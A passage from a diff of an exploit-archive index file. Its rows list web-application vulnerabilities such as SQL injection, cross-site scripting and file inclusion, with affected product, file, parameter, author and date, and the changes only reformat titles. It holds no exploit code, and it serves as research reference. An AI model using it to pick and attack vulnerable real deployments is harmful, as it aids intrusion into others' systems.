Scripting",2008-05-02,"Khashayar Fereidani",php,webapps,0 -31722,platforms/php/webapps/31722.txt,"EJ3 BlackBook 1.0 - header.php Multiple Parameter Cross-Site Scripting",2008-05-02,"Khashayar Fereidani",php,webapps,0 -31723,platforms/php/webapps/31723.txt,"Alumni 1.0.8/1.0.9 - info.php id Parameter SQL Injection",2008-05-02,hadihadi,php,webapps,0 +31721,platforms/php/webapps/31721.txt,"EJ3 BlackBook 1.0 - 'footer.php' Multiple Cross-Site Scripting Vulnerabilities",2008-05-02,"Khashayar Fereidani",php,webapps,0 +31722,platforms/php/webapps/31722.txt,"EJ3 BlackBook 1.0 - 'header.php' Multiple Cross-Site Scripting Vulnerabilities",2008-05-02,"Khashayar Fereidani",php,webapps,0 +31723,platforms/php/webapps/31723.txt,"Alumni 1.0.8/1.0.9 - 'info.php?id' SQL Injection",2008-05-02,hadihadi,php,webapps,0 31724,platforms/php/webapps/31724.txt,"Alumni 1.0.8/1.0.9 - 'index.php' year Parameter Cross-Site Scripting",2008-05-02,hadihadi,php,webapps,0 31725,platforms/php/webapps/31725.txt,"Zen Cart 2008 - 'index.php' keyword Parameter SQL Injection",2008-05-02,"Ivan Sanchez",php,webapps,0 31726,platforms/php/webapps/31726.txt,"Zen Cart 2008 - 'index.php' keyword Parameter Cross-Site Scripting",2008-05-02,"Ivan Sanchez",php,webapps,0 31727,platforms/php/webapps/31727.txt,"Chicomas 2.0.4 - 'index.php' Cross-Site Scripting",2008-05-02,"Hadi Kiamarsi",php,webapps,0 31729,platforms/php/webapps/31729.pl,"SiteXS CMS 0.1.1 - 'upload.php' Arbitrary File Upload",2008-05-03,"Hadi Kiamarsi",php,webapps,0 -31730,platforms/php/webapps/31730.txt,"GEDCOM_TO_MYSQL - PHP/prenom.php Multiple Parameter Cross-Site Scripting",2008-05-05,ZoRLu,php,webapps,0 -31731,platforms/php/webapps/31731.txt,"GEDCOM_TO_MYSQL - PHP/index.php nom_branche Parameter Cross-Site Scripting",2008-05-05,ZoRLu,php,webapps,0 -31732,platforms/php/webapps/31732.txt,"GEDCOM_TO_MYSQL - PHP/info.php Multiple Parameter Cross-Site Scripting",2008-05-05,ZoRLu,php,webapps,0 +31730,platforms/php/webapps/31730.txt,"GEDCOM_TO_MYSQL - 'PHP/prenom.php' Multiple Cross-Site Scripting Vulnerabilities",2008-05-05,ZoRLu,php,webapps,0 +31731,platforms/php/webapps/31731.txt,"GEDCOM_TO_MYSQL - 'PHP/index.php?nom_branche' Cross-Site Scripting",2008-05-05,ZoRLu,php,webapps,0 +31732,platforms/php/webapps/31732.txt,"GEDCOM_TO_MYSQL - 'PHP/info.php' Multiple Cross-Site Scripting Vulnerabilities",2008-05-05,ZoRLu,php,webapps,0 31733,platforms/ios/webapps/31733.txt,"My PDF Creator & DE DM 1.4 iOS - Multiple Vulnerabilities",2014-02-18,Vulnerability-Lab,ios,webapps,50496 32240,platforms/php/webapps/32240.txt,"Freeway 1.4.1 - Multiple Input Validation Vulnerabilities",2008-08-13,"Digital Security Research Group",php,webapps,0 31734,platforms/php/webapps/31734.txt,"Pina CMS - Multiple Vulnerabilities",2014-02-18,"Shadman Tanjim",php,webapps,80 -31735,platforms/php/webapps/31735.txt,"Concrete5 CMS 5.6.2.1 - 'index.php cID' Parameter SQL Injection",2014-02-18,killall-9,php,webapps,80 +31735,platforms/php/webapps/31735.txt,"Concrete5 CMS 5.6.2.1 - 'index.php?cID' SQL Injection",2014-02-18,killall-9,php,webapps,80 31738,platforms/php/webapps/31738.py,"Open Web Analytics 1.5.4 - (owa_email_address Parameter) SQL Injection",2014-02-18,"Dana James Traversie",php,webapps,0 31739,platforms/php/webapps/31739.txt,"TLM CMS 1.1 - 'index.php' Multiple SQL Injections",2008-05-05,ZoRLu,php,webapps,0 31740,platforms/php/webapps/31740.html,"LifeType 1.2.8 - 'admin.php' Cross-Site Scripting",2008-05-05,"Khashayar Fereidani",php,webapps,0 -31741,platforms/php/webapps/31741.txt,"Maian Uploader 4.0 - 'keywords' Parameter Cross-Site Scripting",2008-05-05,"Khashayar Fereidani",php,webapps,0 +31741,platforms/php/webapps/31741.txt,"Maian Uploader 4.0 - 'keywords' Cross-Site Scripting",2008-05-05,"Khashayar Fereidani",php,webapps,0 31742,platforms/php/webapps/31742.txt,"Maian Uploader 4.0 - 'index.php' Cross-Site Scripting",2008-05-05,"Khashayar Fereidani",php,webapps,0 31743,platforms/php/webapps/31743.txt,"Maian Uploader 4.0 - 'header.php' Cross-Site Scripting",2008-05-05,"Khashayar Fereidani",php,webapps,0 31744,platforms/php/webapps/31744.txt,"osCommerce 2.1/2.2 - Multiple Cross-Site Scripting Vulnerabilities",2008-05-05,"David Sopas Ferreira",php,webapps,0 -31745,platforms/php/webapps/31745.txt,"BatmanPorTaL - uyeadmin.asp id Parameter SQL Injection",2008-05-05,U238,php,webapps,0 -31746,platforms/php/webapps/31746.txt,"BatmanPorTaL - profil.asp id Parameter SQL Injection",2008-05-05,U238,php,webapps,0 +31745,platforms/php/webapps/31745.txt,"BatmanPorTaL - 'uyeadmin.asp?id' SQL Injection",2008-05-05,U238,php,webapps,0 +31746,platforms/php/webapps/31746.txt,"BatmanPorTaL - 'profil.asp?id' SQL Injection",2008-05-05,U238,php,webapps,0 31747,platforms/php/webapps/31747.pl,"iGaming CMS 1.5 - 'poll_vote.php' SQL Injection",2008-05-05,Cod3rZ,php,webapps,0 31749,platforms/php/webapps/31749.py,"RunCMS 1.6.1 - 'pm.class.php' Multiple SQL Injections",2008-05-06,The:Paradox,php,webapps,0 31750,platforms/php/webapps/31750.txt,"QTO File Manager 1.0 - 'qtofm.php' Arbitrary File Upload",2008-05-06,"CrAzY CrAcKeR",php,webapps,0 -31751,platforms/php/webapps/31751.txt,"Sphider 1.3.4 - 'query' Parameter Cross-Site Scripting",2008-05-06,"Christian Holler",php,webapps,0 -31752,platforms/php/webapps/31752.txt,"Forum Rank System 6 - 'settings['locale']' Parameter Multiple Local File Inclusion",2008-05-07,Matrix86,php,webapps,0 +31751,platforms/php/webapps/31751.txt,"Sphider 1.3.4 - 'query' Cross-Site Scripting",2008-05-06,"Christian Holler",php,webapps,0 +31752,platforms/php/webapps/31752.txt,"Forum Rank System 6 - 'settings['locale']' Multiple Local File Inclusions",2008-05-07,Matrix86,php,webapps,0 31753,platforms/php/webapps/31753.txt,"Tux CMS 0.1 - Multiple Cross-Site Scripting Vulnerabilities",2008-05-07,"Hadi Kiamarsi",php,webapps,0 31754,platforms/cgi/webapps/31754.txt,"SAP Internet Transaction Server 6200.1017.50954.0 - Bu WGate 'wgate.dll' ~service Parameter Cross-Site Scripting",2008-05-08,Portcullis,cgi,webapps,0 31755,platforms/cgi/webapps/31755.txt,"SAP Internet Transaction Server 6200.1017.50954.0 - Bu query String JavaScript Splicing Cross-Site Scripting",2008-05-08,Portcullis,cgi,webapps,0 @@ -32724,15 +32725,15 @@ id,file,description,date,author,platform,type,port 31771,platforms/php/webapps/31771.txt,"cPanel 11.x - scripts2/knowlegebase issue Parameter Cross-Site Scripting",2008-05-09,"Matteo Carli",php,webapps,0 31772,platforms/php/webapps/31772.txt,"cPanel 11.x - scripts2/changeip user Parameter Cross-Site Scripting",2008-05-09,"Matteo Carli",php,webapps,0 31773,platforms/php/webapps/31773.txt,"cPanel 11.x - scripts2/listaccts search Parameter Cross-Site Scripting",2008-05-09,"Matteo Carli",php,webapps,0 -31774,platforms/php/webapps/31774.txt,"BlogPHP 2.0 - 'index.php' Multiple Parameter Cross-Site Scripting",2008-05-10,"David Sopas Ferreira",php,webapps,0 +31774,platforms/php/webapps/31774.txt,"BlogPHP 2.0 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2008-05-10,"David Sopas Ferreira",php,webapps,0 31775,platforms/php/webapps/31775.txt,"OtherLogic - 'vocourse.php' SQL Injection",2008-05-10,Breeeeh,php,webapps,0 -31776,platforms/php/webapps/31776.txt,"WordPress Plugin WP Photo Album - 'photo' Parameter SQL Injection",2008-05-09,THE_MILLER,php,webapps,0 +31776,platforms/php/webapps/31776.txt,"WordPress Plugin WP Photo Album - 'photo' SQL Injection",2008-05-09,THE_MILLER,php,webapps,0 31777,platforms/php/webapps/31777.txt,"AJ Classifieds - 'index.php' SQL Injection",2008-05-12,t0pP8uZz,php,webapps,0 31778,platforms/php/webapps/31778.txt,"PHPInstantGallery 2.0 - 'index.php' Gallery Parameter Cross-Site Scripting",2008-05-12,ZoRLu,php,webapps,0 -31779,platforms/php/webapps/31779.txt,"PHPInstantGallery 2.0 - image.php Multiple Parameter Cross-Site Scripting",2008-05-12,ZoRLu,php,webapps,0 +31779,platforms/php/webapps/31779.txt,"PHPInstantGallery 2.0 - 'image.php' Multiple Cross-Site Scripting Vulnerabilities",2008-05-12,ZoRLu,php,webapps,0 31780,platforms/php/webapps/31780.txt,"CyrixMED 1.4 - 'index.php' Cross-Site Scripting",2008-05-12,ZoRLu,php,webapps,0 31781,platforms/php/webapps/31781.txt,"IBD Micro CMS 3.5 - 'microcms-admin-login.php' Multiple SQL Injections",2008-05-12,SkyOut,php,webapps,0 -31782,platforms/php/webapps/31782.txt,"Claroline 1.7.5 - Multiple Remote File Inclusion",2008-05-12,MajnOoNxHaCkEr,php,webapps,0 +31782,platforms/php/webapps/31782.txt,"Claroline 1.7.5 - Multiple Remote File Inclusions",2008-05-12,MajnOoNxHaCkEr,php,webapps,0 31783,platforms/php/webapps/31783.txt,"Fusebox 5.5.1 - 'fusebox5.php' Remote File Inclusion",2008-05-12,MajnOoNxHaCkEr,php,webapps,0 31784,platforms/php/webapps/31784.txt,"phpMyAgenda 2.1 - 'infoevent.php3' Remote File Inclusion",2008-05-12,MajnOoNxHaCkEr,php,webapps,0 31787,platforms/php/webapps/31787.txt,"Kalptaru Infotech Automated Link Exchange Portal - 'linking.page.php' SQL Injection",2008-05-13,HaCkeR_EgY,php,webapps,0 @@ -32741,98 +32742,98 @@ id,file,description,date,author,platform,type,port 31793,platforms/php/webapps/31793.txt,"Horde Turba 3.1.7 - Multiple Cross-Site Scripting Vulnerabilities",2008-05-14,"Ivan Javier Sanchez",php,webapps,0 31794,platforms/php/webapps/31794.txt,"PicsEngine 1.0 - 'index.php' Cross-Site Scripting",2008-05-14,ZoRLu,php,webapps,0 31795,platforms/php/webapps/31795.txt,"Links Pile - 'link.php' SQL Injection",2008-08-14,HaCkeR_EgY,php,webapps,0 -31797,platforms/asp/webapps/31797.txt,"philboard 0.5 - W1L3D4_foruma_yeni_konu_ac.asp forumid Parameter SQL Injection",2008-05-14,U238,asp,webapps,0 -31798,platforms/php/webapps/31798.txt,"philboard 0.5 - W1L3D4_konuoku.asp id Parameter SQL Injection",2008-05-14,U238,php,webapps,0 -31799,platforms/php/webapps/31799.txt,"philboard 0.5 - W1L3D4_konuya_mesaj_yaz.asp Multiple Parameter SQL Injection",2008-05-14,U238,php,webapps,0 +31797,platforms/asp/webapps/31797.txt,"philboard 0.5 - 'W1L3D4_foruma_yeni_konu_ac.asp?forumid' SQL Injection",2008-05-14,U238,asp,webapps,0 +31798,platforms/php/webapps/31798.txt,"philboard 0.5 - 'W1L3D4_konuoku.asp?id' SQL Injection",2008-05-14,U238,php,webapps,0 +31799,platforms/php/webapps/31799.txt,"philboard 0.5 - 'W1L3D4_konuya_mesaj_yaz.asp' Multiple SQL Injections",2008-05-14,U238,php,webapps,0 31800,platforms/php/webapps/31800.pl,"SunShop Shopping Cart 3.5.1 - 'index.php' SQL Injection",2008-05-15,irvian,php,webapps,0 31801,platforms/php/webapps/31801.txt,"ACGV News 0.9.1 - 'glossaire.php' id Parameter SQL Injection",2008-05-16,ZoRLu,php,webapps,0 31802,platforms/php/webapps/31802.txt,"ACGV News 0.9.1 - 'glossaire.php' id Parameter Cross-Site Scripting",2008-05-16,ZoRLu,php,webapps,0 31803,platforms/php/webapps/31803.txt,"AN Guestbook 0.4 - 'send_email.php' Cross-Site Scripting",2008-05-16,ZoRLu,php,webapps,0 31804,platforms/php/webapps/31804.txt,"Digital Hive 2.0 - 'base_include.php' Local File Inclusion",2008-05-16,ZoRLu,php,webapps,0 -31805,platforms/php/webapps/31805.txt,"PHP-Nuke 'KuiraniKerim' Module - 'sid' Parameter SQL Injection",2008-05-17,Lovebug,php,webapps,0 -31806,platforms/php/webapps/31806.txt,"bcoos 1.0.13 - 'file' Parameter Local File Inclusion",2008-05-19,Lostmon,php,webapps,0 +31805,platforms/php/webapps/31805.txt,"PHP-Nuke 'KuiraniKerim' Module - 'sid' SQL Injection",2008-05-17,Lovebug,php,webapps,0 +31806,platforms/php/webapps/31806.txt,"bcoos 1.0.13 - 'file' Local File Inclusion",2008-05-19,Lostmon,php,webapps,0 31807,platforms/php/webapps/31807.txt,"cPanel 11.21 - 'wwwact' Privilege Escalation",2008-05-19,"Ali Jasbi",php,webapps,0 -31808,platforms/php/webapps/31808.txt,"AppServ Open Project 2.5.10 - 'appservlang' Parameter Cross-Site Scripting",2008-05-20,"CWH Underground",php,webapps,0 +31808,platforms/php/webapps/31808.txt,"AppServ Open Project 2.5.10 - 'appservlang' Cross-Site Scripting",2008-05-20,"CWH Underground",php,webapps,0 31809,platforms/php/webapps/31809.txt,"Starsgames Control Panel 4.6.2 - 'index.php' Cross-Site Scripting",2008-05-20,"CWH Underground",php,webapps,0 -31810,platforms/php/webapps/31810.txt,"Web Slider 0.6 - 'slide' Parameter SQL Injection",2008-05-20,"fahn zichler",php,webapps,0 +31810,platforms/php/webapps/31810.txt,"Web Slider 0.6 - 'slide' SQL Injection",2008-05-20,"fahn zichler",php,webapps,0 31811,platforms/asp/webapps/31811.txt,"Site Tanitimlari Scripti - Multiple SQL Injections",2008-05-20,"fahn zichler",asp,webapps,0 -31812,platforms/asp/webapps/31812.txt,"DizaynPlus Nobetci Eczane Takip 1.0 - 'ayrinti.asp' Parameter SQL Injection",2008-05-20,U238,asp,webapps,0 +31812,platforms/asp/webapps/31812.txt,"DizaynPlus Nobetci Eczane Takip 1.0 - 'ayrinti.asp' SQL Injection",2008-05-20,U238,asp,webapps,0 31813,platforms/php/webapps/31813.txt,"eCMS 0.4.2 - Multiple Vulnerabilities",2008-05-20,hadihadi,php,webapps,0 31816,platforms/java/webapps/31816.txt,"SAP Web Application Server 7.0 - '/sap/bc/gui/sap/its/webgui/' Cross-Site Scripting",2008-05-21,DSecRG,java,webapps,0 -31821,platforms/php/webapps/31821.txt,"PHPFreeForum 1.0 rc2 - error.php message Parameter Cross-Site Scripting",2008-05-22,tan_prathan,php,webapps,0 -31822,platforms/php/webapps/31822.txt,"PHPFreeForum 1.0 rc2 - part/menu.php Multiple Parameter Cross-Site Scripting",2008-05-22,tan_prathan,php,webapps,0 -31823,platforms/php/webapps/31823.txt,"phpSQLiteCMS 1 RC2 - cms/includes/header.inc.php Multiple Parameter Cross-Site Scripting",2008-05-22,"CWH Underground",php,webapps,0 -31824,platforms/php/webapps/31824.txt,"phpSQLiteCMS 1 RC2 - cms/includes/login.inc.php Multiple Parameter Cross-Site Scripting",2008-05-22,"CWH Underground",php,webapps,0 +31821,platforms/php/webapps/31821.txt,"PHPFreeForum 1.0 rc2 - 'error.php?message' Cross-Site Scripting",2008-05-22,tan_prathan,php,webapps,0 +31822,platforms/php/webapps/31822.txt,"PHPFreeForum 1.0 rc2 - 'part/menu.php' Multiple Cross-Site Scripting Vulnerabilities",2008-05-22,tan_prathan,php,webapps,0 +31823,platforms/php/webapps/31823.txt,"phpSQLiteCMS 1 RC2 - 'cms/includes/header.inc.php' Multiple Cross-Site Scripting Vulnerabilities",2008-05-22,"CWH Underground",php,webapps,0 +31824,platforms/php/webapps/31824.txt,"phpSQLiteCMS 1 RC2 - 'cms/includes/login.inc.php' Multiple Cross-Site Scripting Vulnerabilities",2008-05-22,"CWH Underground",php,webapps,0 31825,platforms/php/webapps/31825.txt,"BMForum 5.6 - 'index.php' Cross-Site Scripting",2008-05-22,"CWH Underground",php,webapps,0 31826,platforms/php/webapps/31826.txt,"BMForum 5.6 - 'bsd01footer.php' Cross-Site Scripting",2008-05-22,"CWH Underground",php,webapps,0 31827,platforms/php/webapps/31827.txt,"BMForum 5.6 - 'bsd01header.php' Cross-Site Scripting",2008-05-22,"CWH Underground",php,webapps,0 -31829,platforms/php/webapps/31829.txt,"AbleDating 2.4 - search_results.php keyword Parameter SQL Injection",2008-05-22,"Ali Jasbi",php,webapps,0 -31830,platforms/php/webapps/31830.txt,"AbleDating 2.4 - search_results.php keyword Parameter Cross-Site Scripting",2008-05-22,"Ali Jasbi",php,webapps,0 +31829,platforms/php/webapps/31829.txt,"AbleDating 2.4 - 'search_results.php?keyword' SQL Injection",2008-05-22,"Ali Jasbi",php,webapps,0 +31830,platforms/php/webapps/31830.txt,"AbleDating 2.4 - 'search_results.php?keyword' Cross-Site Scripting",2008-05-22,"Ali Jasbi",php,webapps,0 32045,platforms/php/webapps/32045.txt,"eSyndiCat 2.2 - 'register.php' Multiple Cross-Site Scripting Vulnerabilities",2008-07-10,Fugitif,php,webapps,0 31833,platforms/php/webapps/31833.txt,"ILIAS 4.4.1 - Multiple Vulnerabilities",2014-02-22,HauntIT,php,webapps,80 -31834,platforms/php/webapps/31834.txt,"WordPress Plugin AdRotate 3.9.4 - 'clicktracker.ph track' Parameter SQL Injection",2014-02-22,"High-Tech Bridge SA",php,webapps,80 +31834,platforms/php/webapps/31834.txt,"WordPress Plugin AdRotate 3.9.4 - 'clicktracker.ph?track' SQL Injection",2014-02-22,"High-Tech Bridge SA",php,webapps,80 31835,platforms/php/webapps/31835.txt,"Apple Safari Montage 3.1.3 - 'forgotPW.php' Multiple Cross-Site Scripting Vulnerabilities",2008-05-22,"Omer Singer",php,webapps,0 31836,platforms/php/webapps/31836.txt,"WordPress Plugin Upload File - 'wp-uploadfile.php' SQL Injection",2008-05-24,eserg.ru,php,webapps,0 -31837,platforms/php/webapps/31837.txt,"DZOIC Handshakes 3.5 - 'fname' Parameter SQL Injection",2008-05-24,"Ali Jasbi",php,webapps,0 -31838,platforms/php/webapps/31838.txt,"Horde Multiple Product - workweek.php Timestamp Parameter Cross-Site Scripting",2008-05-24,"Ivan Sanchez",php,webapps,0 -31839,platforms/php/webapps/31839.txt,"Horde Multiple Product - week.php Timestamp Parameter Cross-Site Scripting",2008-05-24,"Ivan Sanchez",php,webapps,0 -31840,platforms/php/webapps/31840.txt,"Horde Multiple Product - day.php Timestamp Parameter Cross-Site Scripting",2008-05-24,"Ivan Sanchez",php,webapps,0 +31837,platforms/php/webapps/31837.txt,"DZOIC Handshakes 3.5 - 'fname' SQL Injection",2008-05-24,"Ali Jasbi",php,webapps,0 +31838,platforms/php/webapps/31838.txt,"Horde Multiple Product - 'workweek.php?Timestamp' Cross-Site Scripting",2008-05-24,"Ivan Sanchez",php,webapps,0 +31839,platforms/php/webapps/31839.txt,"Horde Multiple Product - 'week.php?Timestamp' Cross-Site Scripting",2008-05-24,"Ivan Sanchez",php,webapps,0 +31840,platforms/php/webapps/31840.txt,"Horde Multiple Product - 'day.php?Timestamp' Cross-Site Scripting",2008-05-24,"Ivan Sanchez",php,webapps,0 31841,platforms/php/webapps/31841.txt,"miniCWB 2.1.1 - 'connector.php' Multiple Cross-Site Scripting Vulnerabilities",2008-05-26,"CWH Underground",php,webapps,0 31842,platforms/php/webapps/31842.txt,"AbleSpace 1.0 - 'adv_cat.php' SQL Injection",2008-05-26,Jasbi,php,webapps,0 31843,platforms/asp/webapps/31843.txt,"Excuse Online - 'pwd.asp' SQL Injection",2008-05-26,Unohope,asp,webapps,0 -31844,platforms/php/webapps/31844.txt,"PHPFix 2.0 - fix/browse.php kind Parameter SQL Injection",2008-05-26,Unohope,php,webapps,0 -31845,platforms/php/webapps/31845.txt,"PHPFix 2.0 - auth/00_pass.php account Parameter SQL Injection",2008-05-26,Unohope,php,webapps,0 -31846,platforms/php/webapps/31846.txt,"ClassSystem 2.0/2.3 - HomepageTop.php teacher_id Parameter SQL Injection",2008-05-26,Unohope,php,webapps,0 -31847,platforms/php/webapps/31847.txt,"ClassSystem 2.0/2.3 - HomepageMain.php teacher_id Parameter SQL Injection",2008-05-26,Unohope,php,webapps,0 -31848,platforms/php/webapps/31848.txt,"ClassSystem 2.0/2.3 - MessageReply.php teacher_id Parameter SQL Injection",2008-05-26,Unohope,php,webapps,0 +31844,platforms/php/webapps/31844.txt,"PHPFix 2.0 - 'fix/browse.php?kind' SQL Injection",2008-05-26,Unohope,php,webapps,0 +31845,platforms/php/webapps/31845.txt,"PHPFix 2.0 - 'auth/00_pass.php?account' SQL Injection",2008-05-26,Unohope,php,webapps,0 +31846,platforms/php/webapps/31846.txt,"ClassSystem 2.0/2.3 - 'HomepageTop.php?teacher_id' SQL Injection",2008-05-26,Unohope,php,webapps,0 +31847,platforms/php/webapps/31847.txt,"ClassSystem 2.0/2.3 - 'HomepageMain.php?teacher_id' SQL Injection",2008-05-26,Unohope,php,webapps,0 +31848,platforms/php/webapps/31848.txt,"ClassSystem 2.0/2.3 - 'MessageReply.php?teacher_id' SQL Injection",2008-05-26,Unohope,php,webapps,0 31849,platforms/php/webapps/31849.html,"ClassSystem 2.0/2.3 - class/ApplyDB.php Unrestricted Arbitrary File Upload / Arbitrary Code Execution",2008-05-26,Unohope,php,webapps,0 -31850,platforms/asp/webapps/31850.txt,"Campus Bulletin Board 3.4 - post3/book.asp review Parameter Cross-Site Scripting",2008-05-26,Unohope,asp,webapps,0 -31851,platforms/asp/webapps/31851.txt,"Campus Bulletin Board 3.4 - post3/view.asp id Parameter SQL Injection",2008-05-26,Unohope,asp,webapps,0 -31852,platforms/asp/webapps/31852.txt,"Campus Bulletin Board 3.4 - post3/book.asp review Parameter SQL Injection",2008-05-26,Unohope,asp,webapps,0 +31850,platforms/asp/webapps/31850.txt,"Campus Bulletin Board 3.4 - 'post3/book.asp?review' Cross-Site Scripting",2008-05-26,Unohope,asp,webapps,0 +31851,platforms/asp/webapps/31851.txt,"Campus Bulletin Board 3.4 - 'post3/view.asp?id' SQL Injection",2008-05-26,Unohope,asp,webapps,0 +31852,platforms/asp/webapps/31852.txt,"Campus Bulletin Board 3.4 - 'post3/book.asp?review' SQL Injection",2008-05-26,Unohope,asp,webapps,0 31854,platforms/asp/webapps/31854.html,"The Campus Request Repairs System 1.2 - 'sentout.asp' Unauthorized Access",2008-05-26,Unohope,asp,webapps,0 31855,platforms/php/webapps/31855.txt,"Tr Script News 2.1 - 'news.php' Cross-Site Scripting",2008-05-27,ZoRLu,php,webapps,0 -31857,platforms/php/webapps/31857.txt,"Joomla! / Mambo Component Artists - 'idgalery' Parameter SQL Injection",2008-05-28,Cr@zy_King,php,webapps,0 +31857,platforms/php/webapps/31857.txt,"Joomla! / Mambo Component Artists - 'idgalery' SQL Injection",2008-05-28,Cr@zy_King,php,webapps,0 31858,platforms/php/webapps/31858.txt,"Calcium 3.10/4.0.4 - 'Calcium40.pl' Cross-Site Scripting",2008-05-28,"Marvin Simkin",php,webapps,0 -31859,platforms/asp/webapps/31859.txt,"JustPORTAL 1.0 - 'site' Parameter Multiple SQL Injections",2008-05-29,"Ugurcan Engin",asp,webapps,0 -31860,platforms/asp/webapps/31860.txt,"Proje ASP Portal 2.0 - 'id' Parameter Multiple SQL Injections",2008-05-29,"Ugurcan Engin",asp,webapps,0 +31859,platforms/asp/webapps/31859.txt,"JustPORTAL 1.0 - 'site' Multiple SQL Injections",2008-05-29,"Ugurcan Engin",asp,webapps,0 +31860,platforms/asp/webapps/31860.txt,"Proje ASP Portal 2.0 - 'id' Multiple SQL Injections",2008-05-29,"Ugurcan Engin",asp,webapps,0 31861,platforms/asp/webapps/31861.txt,"dvbbs 8.2 - 'login.asp' Multiple SQL Injections",2008-05-29,hackerbinhphuoc,asp,webapps,0 31865,platforms/asp/webapps/31865.txt,"DotNetNuke 4.8.3 - 'Default.aspx' Cross-Site Scripting",2008-05-30,"AmnPardaz Security Research Team",asp,webapps,0 31866,platforms/php/webapps/31866.txt,"TorrentTrader Classic 1.x - 'scrape.php' SQL Injection",2008-05-31,"Charles Vaughn",php,webapps,0 -31867,platforms/php/webapps/31867.php,"CMS Easyway - 'mid' Parameter SQL Injection",2008-05-30,Lidloses_Auge,php,webapps,0 -31868,platforms/php/webapps/31868.txt,"OtomiGenX 2.2 - 'userAccount' Parameter SQL Injection",2008-06-02,hadihadi,php,webapps,0 +31867,platforms/php/webapps/31867.php,"CMS Easyway - 'mid' SQL Injection",2008-05-30,Lidloses_Auge,php,webapps,0 +31868,platforms/php/webapps/31868.txt,"OtomiGenX 2.2 - 'userAccount' SQL Injection",2008-06-02,hadihadi,php,webapps,0 31869,platforms/asp/webapps/31869.txt,"i-pos StoreFront 1.3 - 'index.asp' SQL Injection",2008-06-02,KnocKout,asp,webapps,0 -31870,platforms/php/webapps/31870.pl,"Joomla! / Mambo Component Joo!BB 0.5.9 - 'forum' Parameter SQL Injection",2008-06-02,His0k4,php,webapps,0 -31871,platforms/asp/webapps/31871.txt,"Te Ecard - 'id' Parameter Multiple SQL Injections",2008-06-02,"Ugurcan Engyn",asp,webapps,0 +31870,platforms/php/webapps/31870.pl,"Joomla! / Mambo Component Joo!BB 0.5.9 - 'forum' SQL Injection",2008-06-02,His0k4,php,webapps,0 +31871,platforms/asp/webapps/31871.txt,"Te Ecard - 'id' Multiple SQL Injections",2008-06-02,"Ugurcan Engyn",asp,webapps,0 31874,platforms/jsp/webapps/31874.py,"Ganib Project Management 2.3 - SQL Injection",2014-02-24,drone,jsp,webapps,80 31880,platforms/php/webapps/31880.txt,"WyMIEN PHP 1.0 - 'index.php' Cross-Site Scripting",2008-06-04,ZoRLu,php,webapps,0 31881,platforms/php/webapps/31881.txt,"PHP Address Book 3.1.5 - Multiple SQL Injections / Cross-Site Scripting Vulnerabilities",2008-06-04,"CWH Underground",php,webapps,0 -31882,platforms/php/webapps/31882.txt,"SamTodo 1.1 - 'tid' Parameter Cross-Site Scripting",2008-06-05,"David Sopas Ferreira",php,webapps,0 -31883,platforms/php/webapps/31883.txt,"SamTodo 1.1 - 'completed' Parameter Cross-Site Scripting",2008-06-05,"David Sopas Ferreira",php,webapps,0 +31882,platforms/php/webapps/31882.txt,"SamTodo 1.1 - 'tid' Cross-Site Scripting",2008-06-05,"David Sopas Ferreira",php,webapps,0 +31883,platforms/php/webapps/31883.txt,"SamTodo 1.1 - 'completed' Cross-Site Scripting",2008-06-05,"David Sopas Ferreira",php,webapps,0 31888,platforms/php/webapps/31888.txt,"SchoolCenter 7.5 - Multiple Cross-Site Scripting Vulnerabilities",2008-06-06,Doz,php,webapps,0 31891,platforms/asp/webapps/31891.txt,"Real Estate Website 1.0 - 'location.asp' Multiple Input Validation Vulnerabilities",2008-06-09,JosS,asp,webapps,0 -31892,platforms/cgi/webapps/31892.txt,"Tornado Knowledge Retrieval System 4.2 - 'p' Parameter Cross-Site Scripting",2008-06-10,Unohope,cgi,webapps,0 +31892,platforms/cgi/webapps/31892.txt,"Tornado Knowledge Retrieval System 4.2 - 'p' Cross-Site Scripting",2008-06-10,Unohope,cgi,webapps,0 31893,platforms/php/webapps/31893.txt,"Hot Links SQL-PHP - Multiple Cross-Site Scripting Vulnerabilities",2008-06-10,sl4xUz,php,webapps,0 31894,platforms/hardware/webapps/31894.txt,"Technicolor TC7200 - Credentials Disclosure",2014-02-25,"Jeroen - IT Nerdbox",hardware,webapps,80 31896,platforms/ios/webapps/31896.txt,"WiFiles HD 1.3 iOS - Locla File Inclusion",2014-02-25,Vulnerability-Lab,ios,webapps,8080 31898,platforms/php/webapps/31898.txt,"Sendy 1.1.8.4 - SQL Injection",2014-02-25,Hurley,php,webapps,80 31900,platforms/ios/webapps/31900.txt,"Private Camera Pro 5.0 iOS - Multiple Vulnerabilities",2014-02-25,Vulnerability-Lab,ios,webapps,0 31902,platforms/php/webapps/31902.txt,"Noticia Portal - 'detalle_noticia.php' SQL Injection",2008-06-10,t@nzo0n,php,webapps,0 -31904,platforms/php/webapps/31904.txt,"PHPEasyData 1.5.4 - annuaire.php annuaire Parameter SQL Injection",2008-06-11,"Sylvain THUAL",php,webapps,0 +31904,platforms/php/webapps/31904.txt,"PHPEasyData 1.5.4 - 'annuaire.php?annuaire' SQL Injection",2008-06-11,"Sylvain THUAL",php,webapps,0 31905,platforms/php/webapps/31905.txt,"PHPEasyData 1.5.4 - 'admin/login.php Username' SQL Injection",2008-06-11,"Sylvain THUAL",php,webapps,0 -31906,platforms/php/webapps/31906.txt,"PHPEasyData 1.5.4 - last_records.php annuaire Parameter Cross-Site Scripting",2008-06-11,"Sylvain THUAL",php,webapps,0 -31907,platforms/php/webapps/31907.txt,"PHPEasyData 1.5.4 - annuaire.php Multiple Parameter Cross-Site Scripting",2008-06-11,"Sylvain THUAL",php,webapps,0 +31906,platforms/php/webapps/31906.txt,"PHPEasyData 1.5.4 - 'last_records.php?annuaire' Cross-Site Scripting",2008-06-11,"Sylvain THUAL",php,webapps,0 +31907,platforms/php/webapps/31907.txt,"PHPEasyData 1.5.4 - 'annuaire.php' Multiple Cross-Site Scripting Vulnerabilities",2008-06-11,"Sylvain THUAL",php,webapps,0 31908,platforms/php/webapps/31908.txt,"Flat Calendar 1.1 - Multiple Administrative Scripts Authentication Bypass Vulnerabilities",2008-06-11,Crackers_Child,php,webapps,0 -31910,platforms/php/webapps/31910.txt,"vBulletin 3.6.10/3.7.1 - 'redirect' Parameter Cross-Site Scripting",2008-06-13,anonymous,php,webapps,0 +31910,platforms/php/webapps/31910.txt,"vBulletin 3.6.10/3.7.1 - 'redirect' Cross-Site Scripting",2008-06-13,anonymous,php,webapps,0 31916,platforms/php/webapps/31916.txt,"Piwigo 2.6.1 - Cross-Site Request 